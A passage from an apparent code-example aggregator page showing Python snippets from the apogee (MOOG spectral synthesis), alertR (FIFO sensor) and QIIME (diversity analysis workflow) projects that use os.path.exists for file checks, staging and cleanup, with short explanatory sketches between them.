                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif isinstance(isotopes,str) and isotopes.lower() == 'arcturus':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'0.91',
                   '606.01213':'8',
                   '606.01313':'81',
                   '607.01214':'0.91',
                   '607.01314':'8',
                   '607.01215':'273',
                   '608.01216':'0.91',
                   '608.01316':'8',
                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif not isinstance(isotopes,dict):
        raise ValueError("'isotopes=' input not understood, should be 'solar', 'arcturus', or a dictionary")
    # Get the filename of the model atmosphere
    modelatm= kwargs.pop('modelatm',None)
    if not modelatm is None:
        if isinstance(modelatm,str) and os.path.exists(modelatm):
            modelfilename= modelatm
        elif isinstance(modelatm,str):
            raise ValueError('modelatm= input is a non-existing filename')
        else:
            raise ValueError('modelatm= in moogsynth should be set to the name of a file')
    else:
        modelfilename= appath.modelAtmospherePath(**kwargs)
    # Check whether a MOOG version exists
    if not os.path.exists(modelfilename.replace('.mod','.org')):
        # Convert to MOOG format
        convert_modelAtmosphere(modelatm=modelfilename,**kwargs)
    modeldirname= os.path.dirname(modelfilename)
    modelbasename= os.path.basename(modelfilename)
    # Get the name of the linelist
    if linelist is None:
        linelistfilename= modelbasename.replace('.mod','.lines')
        if not os.path.exists(os.path.join(modeldirname,linelistfilename)):
            raise IOError('No linelist given and no weed-out version found for this atmosphere; either specify a linelist or run weedout first')
        linelistfilename= os.path.join(modeldirname,linelistfilename)
    elif os.path.exists(linelist):
        linelistfilename= linelist
    else:
        linelistfilename= appath.linelistPath(linelist,
                                              dr=kwargs.get('dr',None))
    if not os.path.exists(linelistfilename):
        raise RuntimeError("Linelist %s not found; download linelist w/ apogee.tools.download.linelist (if you have access)" % linelistfilename)
    # We will run in a subdirectory of the relevant model atmosphere
    tmpDir= tempfile.mkdtemp(dir=modeldirname)
    shutil.copy(linelistfilename,tmpDir)
    # Cut the linelist to the desired wavelength range
    with open(os.path.join(tmpDir,'cutlines.awk'),'w') as awkfile:
        awkfile.write('$1>%.3f && $1<%.3f\n' %(wmin-width,wmax+width))
    keeplines= open(os.path.join(tmpDir,'lines.tmp'),'w')
    stderr= open('/dev/null','w')
    try:
        subprocess.check_call(['awk','-f','cutlines.awk',
                               os.path.basename(linelistfilename)],
                              cwd=tmpDir,stdout=keeplines,stderr=stderr)
        keeplines.close()
        shutil.copy(os.path.join(tmpDir,'lines.tmp'),
                    os.path.join(tmpDir,os.path.basename(linelistfilename)))
    except subprocess.CalledProcessError:
        print("Removing unnecessary linelist entries failed ...")
    finally:
        os.remove(os.path.join(tmpDir,'cutlines.awk'))
        os.remove(os.path.join(tmpDir,'lines.tmp'))
        stderr.close()
    # Also copy the strong lines
    stronglinesfilename= appath.linelistPath('stronglines.vac',
                                             dr=kwargs.get('dr',None))
    if not os.path.exists(stronglinesfilename):
        try:
            download.linelist('stronglines.vac',dr=kwargs.get('dr',None))
        except:
            raise RuntimeError("Linelist stronglines.vac not found or downloading failed; download linelist w/ apogee.tools.download.linelist (if you have access)")
        finally:
            if os.path.exists(os.path.join(tmpDir,'synth.par')):
                os.remove(os.path.join(tmpDir,'synth.par'))
            if os.path.exists(os.path.join(tmpDir,'std.out')):
                os.remove(os.path.join(tmpDir,'std.out'))
            if os.path.exists(os.path.join(tmpDir,
                                           os.path.basename(linelistfilename))):
                os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
            if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
                os.remove(os.path.join(tmpDir,'stronglines.vac'))
            os.rmdir(tmpDir)
    shutil.copy(stronglinesfilename,tmpDir)
    # Now write the script file
    if len(args) == 0: #special case that there are *no* differences
        args= ([26,0.],)
    nsynths= numpy.array([len(args[ii])-1 for ii in range(len(args))])
    nsynth= numpy.amax(nsynths) #Take the longest abundance list
    if nsynth > 5:
        raise ValueError("MOOG only allows five syntheses to be run at the same time; please reduce the number of abundance values in the apogee.modelspec.moog.moogsynth input")
    nabu= len(args)
    with open(os.path.join(tmpDir,'synth.par'),'w') as parfile:
        if doflux:
            parfile.write('doflux\n')
        else:
            parfile.write('synth\n')
        parfile.write('terminal x11\n')
        parfile.write('plot 1\n')
        parfile.write("standard_out std.out\n")
        parfile.write("summary_out '../synth.out'\n")
        parfile.write("smoothed_out '/dev/null'\n")
        parfile.write("strong 1\n")
        parfile.write("damping 0\n")
        parfile.write("stronglines_in stronglines.vac\n")
        parfile.write("model_in '../%s'\n" % modelbasename.replace('.mod','.org'))
        parfile.write("lines_in %s\n" % os.path.basename(linelistfilename))
        parfile.write("atmosphere 1\n")
        parfile.write("molecules 2\n")
        parfile.write("lines 1\n")
        parfile.write("flux/int 0\n")
        # Write the isotopes
        niso= len(isotopes)
        parfile.write("isotopes %i %i\n" % (niso,nsynth))
        for iso in isotopes:
            isotopestr= iso
            for ii in range(nsynth):
                isotopestr+= ' '+isotopes[iso]
            parfile.write(isotopestr+'\n')
        # Abundances
        parfile.write("abundances %i %i\n" % (nabu,nsynth))
        for ii in range(nabu):
            abustr= '%i' % args[ii][0]
            for jj in range(nsynth):
                try:
                    abustr+= ' %.3f' % args[ii][jj+1]
                except IndexError:
                    abustr+= ' 0.0'
            parfile.write(abustr+"\n")
        # Synthesis limits
        parfile.write("synlimits\n") # Add 0.001 to make sure wmax is included
        parfile.write("%.3f  %.3f  %.3f  %.3f\n" % (wmin,wmax+0.001,dw,width))
    # Now run synth
    sys.stdout.write('\r'+"Running MOOG synth ...\r")
    sys.stdout.flush()
    try:
        p= subprocess.Popen(['moogsilent'],
                            cwd=tmpDir,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
        p.stdin.write(b'synth.par\n')
        stdout, stderr= p.communicate()
    except subprocess.CalledProcessError:
        print("Running synth failed ...")
    finally:
        if os.path.exists(os.path.join(tmpDir,'synth.par')):
            os.remove(os.path.join(tmpDir,'synth.par'))
        if os.path.exists(os.path.join(tmpDir,'std.out')):
            os.remove(os.path.join(tmpDir,'std.out'))
        if os.path.exists(os.path.join(tmpDir,
                                       os.path.basename(linelistfilename))):
            os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
        if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
            os.remove(os.path.join(tmpDir,'stronglines.vac'))
        os.rmdir(tmpDir)
        sys.stdout.write('\r'+download._ERASESTR+'\r')
        sys.stdout.flush()        
    # Now read the output
    wavs= numpy.arange(wmin,wmax+dw,dw)
    if wavs[-1] > wmax+dw/2.: wavs= wavs[:-1]
    if doflux:
        contdata= numpy.loadtxt(os.path.join(modeldirname,'synth.out'),
                                converters={0:lambda x: x.replace('D','E'),
                                            1:lambda x: x.replace('D','E')},
                                usecols=[0,1])
        # Wavelength in summary file appears to be wrong from comparing to 
        # the standard output file
        out= contdata[:,1]
        out/= numpy.nanmean(out) # Make the numbers more manageable
    else:
        with open(os.path.join(modeldirname,'synth.out')) as summfile:
            out= numpy.empty((nsynth,len(wavs)))
            for ii in range(nsynth):
                # Skip to beginning of synthetic spectrum
                while True:
                    line= summfile.readline()
                    if line[0] == 'M': break
                summfile.readline()
                tout= []
                while True:
                    line= summfile.readline()
                    if not line or line[0] == 'A': break
                    tout.extend([float(s) for s in line.split()])
                out[ii]= numpy.array(tout)
    os.remove(os.path.join(modeldirname,'synth.out'))
    if doflux:
        return (wavs,out)
    else:
        return (wavs,1.-out)
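
moogsynth stages its linelists into a temporary directory, checks every input with os.path.exists, and tears the directory down in finally blocks. A stripped-down sketch of that staging-and-cleanup pattern; run_in_scratch_dir and required_files are hypothetical names, and the external-program call is elided:

import os
import shutil
import tempfile

def run_in_scratch_dir(required_files, workdir='.'):
    tmpdir = tempfile.mkdtemp(dir=workdir)
    try:
        for fname in required_files:
            if not os.path.exists(fname):
                raise IOError("required input %s not found" % fname)
            shutil.copy(fname, tmpdir)
        # ... invoke the external program with cwd=tmpdir here ...
    finally:
        # Remove whatever was staged, then the (now empty) directory.
        for fname in required_files:
            staged = os.path.join(tmpdir, os.path.basename(fname))
            if os.path.exists(staged):
                os.remove(staged)
        os.rmdir(tmpdir)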

Example 140

Project: alertR
Source File: sensor.py
View license
	def run(self):

		while True:

			# check if FIFO file exists
			# => remove it if it does
			if os.path.exists(self.fifoFile):
				try:
					os.remove(self.fifoFile)
				except Exception as e:
					logging.exception("[%s]: Could not delete "
						% self.fileName
						+ "FIFO file of sensor with id '%d'."
						% self.id)
					time.sleep(10)
					continue

			# create a new FIFO file
			try:
				os.umask(self.umask)
				os.mkfifo(self.fifoFile)
			except Exception as e:
				logging.exception("[%s]: Could not create "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				time.sleep(10)
				continue

			# read FIFO for data
			data = ""
			try:
				fifo = open(self.fifoFile, "r")
				data = fifo.read()
				fifo.close()
			except Exception as e:
				logging.exception("[%s]: Could not read data from "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				time.sleep(10)
				continue

			logging.debug("[%s]: Received data '%s' from "
				% (self.fileName, data)
				+ "FIFO file of sensor with id '%d'."
				% self.id)

			# parse received data
			try:

				message = json.loads(data)

				# Parse message depending on type.
				# Type: statechange
				if str(message["message"]).upper() == "STATECHANGE":

					# Check if state is valid.
					tempInputState = message["payload"]["state"]
					if not self._checkState(tempInputState):
						logging.error("[%s]: Received state "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data type is valid.
					tempDataType = message["payload"]["dataType"]
					if not self._checkDataType(tempDataType):
						logging.error("[%s]: Received data type "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Set new data.
					if self.sensorDataType == SensorDataType.NONE:
						self.sensorData = None
					elif self.sensorDataType == SensorDataType.INT:
						self.sensorData = int(message["payload"]["data"])
					elif self.sensorDataType == SensorDataType.FLOAT:
						self.sensorData = float(message["payload"]["data"])

					# Set state.
					self.temporaryState = tempInputState

					# Force state change sending if the data could be changed.
					if self.sensorDataType != SensorDataType.NONE:

						# Create state change object that is
						# send to the server.
						self.forceSendStateLock.acquire()
						self.stateChange = StateChange()
						self.stateChange.clientSensorId = self.id
						if tempInputState == self.triggerState:
							self.stateChange.state = 1
						else:
							self.stateChange.state = 0
						self.stateChange.dataType = tempDataType
						self.stateChange.sensorData = self.sensorData
						self.shouldForceSendState = True
						self.forceSendStateLock.release()

				# Type: sensoralert
				elif str(message["message"]).upper() == "SENSORALERT":

					# Check if state is valid.
					tempInputState = message["payload"]["state"]
					if not self._checkState(tempInputState):
						logging.error("[%s]: Received state "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if hasOptionalData field is valid.
					tempHasOptionalData = message[
						"payload"]["hasOptionalData"]
					if not self._checkHasOptionalData(tempHasOptionalData):
						logging.error("[%s]: Received hasOptionalData field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data type is valid.
					tempDataType = message["payload"]["dataType"]
					if not self._checkDataType(tempDataType):
						logging.error("[%s]: Received data type "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					if self.sensorDataType == SensorDataType.NONE:
						tempSensorData = None
					elif self.sensorDataType == SensorDataType.INT:
						tempSensorData = int(message["payload"]["data"])
					elif self.sensorDataType == SensorDataType.FLOAT:
						tempSensorData = float(message["payload"]["data"])

					# Check if hasLatestData field is valid.
					tempHasLatestData = message[
						"payload"]["hasLatestData"]
					if not self._checkHasLatestData(tempHasLatestData):
						logging.error("[%s]: Received hasLatestData field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if changeState field is valid.
					tempChangeState = message[
						"payload"]["changeState"]
					if not self._checkChangeState(tempChangeState):
						logging.error("[%s]: Received changeState field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data should be transferred with the sensor alert
					# => if so, parse it
					tempOptionalData = None
					if tempHasOptionalData:

						tempOptionalData = message["payload"]["optionalData"]

						# check if data is of type dict
						if not isinstance(tempOptionalData, dict):
							logging.warning("[%s]: Received optional data "
								% self.fileName
								+ "from FIFO file of sensor with id '%d' "
								% self.id
								+ "invalid. Ignoring message.")
							continue

					# Set optional data.
					self.hasOptionalData = tempHasOptionalData
					self.optionalData = tempOptionalData

					# Set new data.
					if tempHasLatestData:
						self.sensorData = tempSensorData

					# Set state.
					if tempChangeState:
						self.temporaryState = tempInputState

					# Create sensor alert object that is send to the server.
					self.forceSendAlertLock.acquire()
					self.sensorAlert = SensorAlert()
					self.sensorAlert.clientSensorId = self.id
					if tempInputState == self.triggerState:
						self.sensorAlert.state = 1
					else:
						self.sensorAlert.state = 0
					self.sensorAlert.hasOptionalData = tempHasOptionalData
					self.sensorAlert.optionalData = tempOptionalData
					self.sensorAlert.changeState = tempChangeState
					self.sensorAlert.hasLatestData = tempHasLatestData
					self.sensorAlert.dataType = tempDataType
					self.sensorAlert.sensorData = tempSensorData
					self.shouldForceSendAlert = True
					self.forceSendAlertLock.release()

				# Type: invalid
				else:
					raise ValueError("Received invalid message type.")

			except Exception as e:
				logging.exception("[%s]: Could not parse received data from "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				continue
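
The top of this run() loop is a recurring FIFO idiom: a stale pipe left behind by a crash is removed (guarded by os.path.exists) before os.mkfifo recreates it. A minimal, POSIX-only sketch of just that prologue, where recreate_fifo is a hypothetical helper rather than part of alertR:

import os
import logging

def recreate_fifo(fifo_path, umask=0o000):
    # Remove a stale FIFO if one is already present.
    if os.path.exists(fifo_path):
        try:
            os.remove(fifo_path)
        except OSError:
            logging.exception("Could not delete FIFO file %s.", fifo_path)
            return False
    # Create a fresh FIFO with the requested umask.
    try:
        os.umask(umask)
        os.mkfifo(fifo_path)
    except OSError:
        logging.exception("Could not create FIFO file %s.", fifo_path)
        return False
    return True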

Example 141

Project: qiime
Source File: core_diversity_analyses.py
View license
def run_core_diversity_analyses(
        biom_fp,
        mapping_fp,
        sampling_depth,
        output_dir,
        qiime_config,
        command_handler=call_commands_serially,
        tree_fp=None,
        params=None,
        categories=None,
        arare_min_rare_depth=10,
        arare_num_steps=10,
        parallel=False,
        suppress_taxa_summary=False,
        suppress_beta_diversity=False,
        suppress_alpha_diversity=False,
        suppress_group_significance=False,
        status_update_callback=print_to_stdout):
    """
    """
    if categories is not None:
        # Validate categories provided by the users
        mapping_data, mapping_comments = \
            parse_mapping_file_to_dict(open(mapping_fp, 'U'))
        metadata_map = MetadataMap(mapping_data, mapping_comments)
        for c in categories:
            if c not in metadata_map.CategoryNames:
                raise ValueError("Category '%s' is not a column header "
                                 "in your mapping file. "
                                 "Categories are case and white space sensitive. Valid "
                                 "choices are: (%s)" % (c, ', '.join(metadata_map.CategoryNames)))
            if metadata_map.hasSingleCategoryValue(c):
                raise ValueError("Category '%s' contains only one value. "
                                 "Categories analyzed here require at least two values." % c)

    else:
        categories = []
    comma_separated_categories = ','.join(categories)
    # prep some variables
    if params is None:
        params = parse_qiime_parameters([])

    create_dir(output_dir)
    index_fp = '%s/index.html' % output_dir
    index_links = []
    commands = []

    # begin logging
    old_log_fps = glob(join(output_dir, 'log_20*txt'))
    log_fp = generate_log_fp(output_dir)
    index_links.append(
        ('Master run log',
         log_fp,
         _index_headers['run_summary']))
    for old_log_fp in old_log_fps:
        index_links.append(
            ('Previous run log',
             old_log_fp,
             _index_headers['run_summary']))
    logger = WorkflowLogger(log_fp,
                            params=params,
                            qiime_config=qiime_config)
    input_fps = [biom_fp, mapping_fp]
    if tree_fp is not None:
        input_fps.append(tree_fp)
    log_input_md5s(logger, input_fps)

    # run 'biom summarize-table' on input BIOM table
    try:
        params_str = get_params_str(params['biom-summarize-table'])
    except KeyError:
        params_str = ''
    biom_table_stats_output_fp = '%s/biom_table_summary.txt' % output_dir
    if not exists(biom_table_stats_output_fp):
        biom_table_summary_cmd = \
            "biom summarize-table -i %s -o %s %s" % \
            (biom_fp, biom_table_stats_output_fp, params_str)
        commands.append([('Generate BIOM table summary',
                          biom_table_summary_cmd)])
    else:
        logger.write("Skipping 'biom summarize-table' as %s exists.\n\n"
                     % biom_table_stats_output_fp)
    index_links.append(('BIOM table statistics',
                        biom_table_stats_output_fp,
                        _index_headers['run_summary']))

    # filter samples with fewer observations than the requested sampling_depth.
    # since these get filtered for some analyses (eg beta diversity after
    # even sampling) it's useful to filter them here so they're filtered
    # from all analyses.
    filtered_biom_fp = "%s/table_mc%d.biom" % (output_dir, sampling_depth)
    if not exists(filtered_biom_fp):
        filter_samples_cmd = "filter_samples_from_otu_table.py -i %s -o %s -n %d" %\
            (biom_fp, filtered_biom_fp, sampling_depth)
        commands.append(
            [('Filter low sequence count samples from table (minimum sequence count: %d)' % sampling_depth,
              filter_samples_cmd)])
    else:
        logger.write("Skipping filter_samples_from_otu_table.py as %s exists.\n\n"
                     % filtered_biom_fp)
    biom_fp = filtered_biom_fp

    # rarefy the BIOM table to sampling_depth
    rarefied_biom_fp = "%s/table_even%d.biom" % (output_dir, sampling_depth)
    if not exists(rarefied_biom_fp):
        single_rarefaction_cmd = "single_rarefaction.py -i %s -o %s -d %d" %\
            (biom_fp, rarefied_biom_fp, sampling_depth)
        commands.append(
            [('Rarify the OTU table to %d sequences/sample' % sampling_depth,
              single_rarefaction_cmd)])
    else:
        logger.write("Skipping single_rarefaction.py as %s exists.\n\n"
                     % rarefied_biom_fp)

    # run initial commands and reset the command list
    if len(commands) > 0:
        command_handler(commands,
                        status_update_callback,
                        logger,
                        close_logger_on_success=False)
        commands = []

    if not suppress_beta_diversity:
        bdiv_even_output_dir = '%s/bdiv_even%d/' % (output_dir, sampling_depth)
        # Need to check for the existence of any distance matrices, since the user
        # can select which will be generated.
        existing_dm_fps = glob('%s/*_dm.txt' % bdiv_even_output_dir)
        if len(existing_dm_fps) == 0:
            even_dm_fps = run_beta_diversity_through_plots(
                otu_table_fp=rarefied_biom_fp,
                mapping_fp=mapping_fp,
                output_dir=bdiv_even_output_dir,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                # Note: we pass sampling depth=None here as
                # we rarefy the BIOM table above and pass that
                # in here.
                sampling_depth=None,
                tree_fp=tree_fp,
                parallel=parallel,
                logger=logger,
                suppress_md5=True,
                status_update_callback=status_update_callback)
        else:
            logger.write("Skipping beta_diversity_through_plots.py as %s exist(s).\n\n"
                         % ', '.join(existing_dm_fps))
            even_dm_fps = [(split(fp)[1].strip('_dm.txt'), fp)
                           for fp in existing_dm_fps]

        # Get make_distance_boxplots parameters
        try:
            params_str = get_params_str(params['make_distance_boxplots'])
        except KeyError:
            params_str = ''

        for bdiv_metric, dm_fp in even_dm_fps:
            for category in categories:
                boxplots_output_dir = '%s/%s_boxplots/' % (bdiv_even_output_dir,
                                                           bdiv_metric)
                plot_output_fp = '%s/%s_Distances.pdf' % (boxplots_output_dir,
                                                          category)
                stats_output_fp = '%s/%s_Stats.txt' % (boxplots_output_dir,
                                                       category)
                if not exists(plot_output_fp):
                    boxplots_cmd = \
                        'make_distance_boxplots.py -d %s -f %s -o %s -m %s -n 999 %s' %\
                        (dm_fp, category, boxplots_output_dir,
                         mapping_fp, params_str)
                    commands.append([('Boxplots (%s)' % category,
                                      boxplots_cmd)])
                else:
                    logger.write("Skipping make_distance_boxplots.py for %s as %s exists.\n\n"
                                 % (category, plot_output_fp))
                index_links.append(('Distance boxplots (%s)' % bdiv_metric,
                                    plot_output_fp,
                                    _index_headers['beta_diversity_even'] % sampling_depth))
                index_links.append(
                    ('Distance boxplots statistics (%s)' % bdiv_metric,
                     stats_output_fp,
                     _index_headers['beta_diversity_even'] % sampling_depth))

            index_links.append(('PCoA plot (%s)' % bdiv_metric,
                                '%s/%s_emperor_pcoa_plot/index.html' %
                                (bdiv_even_output_dir, bdiv_metric),
                                _index_headers['beta_diversity_even'] % sampling_depth))
            index_links.append(('Distance matrix (%s)' % bdiv_metric,
                                '%s/%s_dm.txt' %
                                (bdiv_even_output_dir, bdiv_metric),
                                _index_headers['beta_diversity_even'] % sampling_depth))
            index_links.append(
                ('Principal coordinate matrix (%s)' % bdiv_metric,
                 '%s/%s_pc.txt' %
                 (bdiv_even_output_dir, bdiv_metric),
                 _index_headers['beta_diversity_even'] % sampling_depth))

    if not suppress_alpha_diversity:
        # Alpha rarefaction workflow
        arare_full_output_dir = '%s/arare_max%d/' % (output_dir,
                                                     sampling_depth)
        rarefaction_plots_output_fp = \
            '%s/alpha_rarefaction_plots/rarefaction_plots.html' % arare_full_output_dir
        if not exists(rarefaction_plots_output_fp):
            run_alpha_rarefaction(
                otu_table_fp=biom_fp,
                mapping_fp=mapping_fp,
                output_dir=arare_full_output_dir,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                tree_fp=tree_fp,
                num_steps=arare_num_steps,
                parallel=parallel,
                logger=logger,
                min_rare_depth=arare_min_rare_depth,
                max_rare_depth=sampling_depth,
                suppress_md5=True,
                status_update_callback=status_update_callback,
                retain_intermediate_files=False)
        else:
            logger.write("Skipping alpha_rarefaction.py as %s exists.\n\n"
                         % rarefaction_plots_output_fp)

        index_links.append(('Alpha rarefaction plots',
                            rarefaction_plots_output_fp,
                            _index_headers['alpha_diversity']))

        collated_alpha_diversity_fps = \
            glob('%s/alpha_div_collated/*txt' % arare_full_output_dir)
        try:
            params_str = get_params_str(params['compare_alpha_diversity'])
        except KeyError:
            params_str = ''

        if len(categories) > 0:
            for collated_alpha_diversity_fp in collated_alpha_diversity_fps:
                alpha_metric = splitext(
                    split(collated_alpha_diversity_fp)[1])[0]
                compare_alpha_output_dir = '%s/compare_%s' % \
                    (arare_full_output_dir, alpha_metric)
                if not exists(compare_alpha_output_dir):
                    compare_alpha_cmd = \
                        'compare_alpha_diversity.py -i %s -m %s -c %s -o %s -n 999 %s' %\
                        (collated_alpha_diversity_fp,
                         mapping_fp,
                         comma_separated_categories,
                         compare_alpha_output_dir,
                         params_str)
                    commands.append(
                        [('Compare alpha diversity (%s)' % alpha_metric,
                          compare_alpha_cmd)])
                    for category in categories:
                        alpha_comparison_stat_fp = '%s/%s_stats.txt' % \
                            (compare_alpha_output_dir, category)
                        alpha_comparison_boxplot_fp = '%s/%s_boxplots.pdf' % \
                            (compare_alpha_output_dir, category)
                        index_links.append(
                            ('Alpha diversity statistics (%s, %s)' % (category, alpha_metric),
                             alpha_comparison_stat_fp,
                             _index_headers['alpha_diversity']))
                        index_links.append(
                            ('Alpha diversity boxplots (%s, %s)' % (category, alpha_metric),
                             alpha_comparison_boxplot_fp,
                             _index_headers['alpha_diversity']))
                else:
                    logger.write("Skipping compare_alpha_diversity.py"
                                 " for %s as %s exists.\n\n"
                                 % (alpha_metric, compare_alpha_output_dir))
        else:
            logger.write("Skipping compare_alpha_diversity.py as"
                         " no categories were provided.\n\n")

    if not suppress_taxa_summary:
        taxa_plots_output_dir = '%s/taxa_plots/' % output_dir
        # need to check for existence of any html files, since the user can
        # select only certain ones to be generated
        existing_taxa_plot_html_fps = glob(join(taxa_plots_output_dir,
                                                'taxa_summary_plots', '*.html'))
        if len(existing_taxa_plot_html_fps) == 0:
            run_summarize_taxa_through_plots(
                otu_table_fp=biom_fp,
                mapping_fp=mapping_fp,
                output_dir=taxa_plots_output_dir,
                mapping_cat=None,
                sort=True,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                logger=logger,
                suppress_md5=True,
                status_update_callback=status_update_callback)
        else:
            logger.write("Skipping summarize_taxa_through_plots.py for as %s exist(s).\n\n"
                         % ', '.join(existing_taxa_plot_html_fps))

        index_links.append(('Taxa summary bar plots',
                            '%s/taxa_summary_plots/bar_charts.html'
                            % taxa_plots_output_dir,
                            _index_headers['taxa_summary']))
        index_links.append(('Taxa summary area plots',
                            '%s/taxa_summary_plots/area_charts.html'
                            % taxa_plots_output_dir,
                            _index_headers['taxa_summary']))
        for category in categories:
            taxa_plots_output_dir = '%s/taxa_plots_%s/' % (output_dir,
                                                           category)
            # need to check for existence of any html files, since the user can
            # select only certain ones to be generated
            existing_taxa_plot_html_fps = glob(
                '%s/taxa_summary_plots/*.html' %
                taxa_plots_output_dir)
            if len(existing_taxa_plot_html_fps) == 0:
                run_summarize_taxa_through_plots(
                    otu_table_fp=biom_fp,
                    mapping_fp=mapping_fp,
                    output_dir=taxa_plots_output_dir,
                    mapping_cat=category,
                    sort=True,
                    command_handler=command_handler,
                    params=params,
                    qiime_config=qiime_config,
                    logger=logger,
                    suppress_md5=True,
                    status_update_callback=status_update_callback)
            else:
                logger.write("Skipping summarize_taxa_through_plots.py for %s as %s exist(s).\n\n"
                             % (category, ', '.join(existing_taxa_plot_html_fps)))

            index_links.append(('Taxa summary bar plots',
                                '%s/taxa_summary_plots/bar_charts.html'
                                % taxa_plots_output_dir,
                                _index_headers['taxa_summary_categorical'] % category))
            index_links.append(('Taxa summary area plots',
                                '%s/taxa_summary_plots/area_charts.html'
                                % taxa_plots_output_dir,
                                _index_headers['taxa_summary_categorical'] % category))

    if not suppress_group_significance:
        params_str = get_params_str(params['group_significance'])
        # group significance tests, aka category significance
        for category in categories:
            group_significance_fp = \
                '%s/group_significance_%s.txt' % (output_dir, category)
            if not exists(group_significance_fp):
                # Build the OTU category significance command
                group_significance_cmd = \
                    'group_significance.py -i %s -m %s -c %s -o %s %s' %\
                    (rarefied_biom_fp, mapping_fp, category,
                     group_significance_fp, params_str)
                commands.append([('Group significance (%s)' % category,
                                  group_significance_cmd)])
            else:
                logger.write("Skipping group_significance.py for %s as %s exists.\n\n"
                             % (category, group_significance_fp))

            index_links.append(('Category significance (%s)' % category,
                                group_significance_fp,
                                _index_headers['group_significance']))

    filtered_biom_gzip_fp = '%s.gz' % filtered_biom_fp
    if not exists(filtered_biom_gzip_fp):
        commands.append(
            [('Compress the filtered BIOM table', 'gzip %s' %
              filtered_biom_fp)])
    else:
        logger.write("Skipping compressing of filtered BIOM table as %s exists.\n\n"
                     % filtered_biom_gzip_fp)
    index_links.append(
        ('Filtered BIOM table (minimum sequence count: %d)' % sampling_depth,
         filtered_biom_gzip_fp,
         _index_headers['run_summary']))

    rarefied_biom_gzip_fp = '%s.gz' % rarefied_biom_fp
    if not exists(rarefied_biom_gzip_fp):
        commands.append(
            [('Compress the rarefied BIOM table', 'gzip %s' %
              rarefied_biom_fp)])
    else:
        logger.write("Skipping compressing of rarefied BIOM table as %s exists.\n\n"
                     % rarefied_biom_gzip_fp)
    index_links.append(
        ('rarefied BIOM table (sampling depth: %d)' % sampling_depth,
         rarefied_biom_gzip_fp,
         _index_headers['run_summary']))

    if len(commands) > 0:
        command_handler(commands, status_update_callback, logger)
    else:
        logger.close()

    generate_index_page(index_links, index_fp)
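
The pattern above repeats for nearly every step: a command is built only when os.path.exists (imported here as exists) reports that the step's output file is missing; otherwise a skip message is logged, which makes the whole workflow resumable. A minimal sketch of that guard, assuming a logger object with a write method; queue_if_missing and its arguments are illustrative names, not part of QIIME:

from os.path import exists

def queue_if_missing(description, cmd, output_fp, commands, logger):
    """Queue a shell command only if its output file does not exist yet."""
    if not exists(output_fp):
        commands.append([(description, cmd)])
    else:
        # On a re-run, completed steps are skipped and only missing outputs
        # are regenerated.
        logger.write("Skipping '%s' as %s exists.\n\n" % (description, output_fp))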

Example 142

Project: apogee
Source File: moog.py
View license
def moogsynth(*args,**kwargs):
    """
    NAME:
       moogsynth
    PURPOSE:
       Run a MOOG synthesis (direct interface to the MOOG code; use 'synth' for a general routine that generates the non-continuum-normalized spectrum, convolves with the LSF and macroturbulence, and optionally continuum normalizes the output)
    INPUT ARGUMENTS:
       lists with abundances (they don't all have to have the same length, missing ones are filled in with zeros):
          [Atomic number1,diff1_1,diff1_2,diff1_3,...,diff1_N]
          [Atomic number2,diff2_1,diff2_2,diff2_3,...,diff2_N]
          ...
          [Atomic numberM,diffM_1,diffM_2,diffM_3,...,diffM_N]
    SYNTHESIS KEYWORDS:
       isotopes= ('solar') use 'solar' or 'arcturus' isotope ratios; can also be a dictionary with isotope ratios (e.g., isotopes= {'108.00116':'1.001','606.01212':'1.01'})
       wmin, wmax, dw, width= (15000.000, 17000.000, 0.10000000, 7.0000000) spectral synthesis limits, step, and width of calculation (see MOOG)
       doflux= (False) if True, calculate the continuum flux instead
    LINELIST KEYWORDS:
       linelist= (None) linelist to use; if this is None, the code looks for a weed-out version of the linelist appropriate for the given model atmosphere; otherwise can be set to the path of a linelist file or to the name of an APOGEE linelist
    ATMOSPHERE KEYWORDS:
       Either:
          (a) modelatm= (None) can be set to the filename of a model atmosphere (needs to end in .mod)
          (b) specify the stellar parameters for a grid point in model atm by
              - lib= ('kurucz_filled') spectral library
              - teff= (4500) grid-point Teff
              - logg= (2.5) grid-point logg
              - metals= (0.) grid-point metallicity
              - cm= (0.) grid-point carbon-enhancement
              - am= (0.) grid-point alpha-enhancement
              - dr= return the path corresponding to this data release
       vmicro= (2.) microturbulence (km/s) (only used if the MOOG-formatted atmosphere file doesn't already exist)
    OUTPUT:
       (wavelengths,spectra (nspec,nwave)) for synth driver
       (wavelengths,continuum spectrum (nwave)) for doflux driver
    HISTORY:
       2015-02-13 - Written - Bovy (IAS)
    """
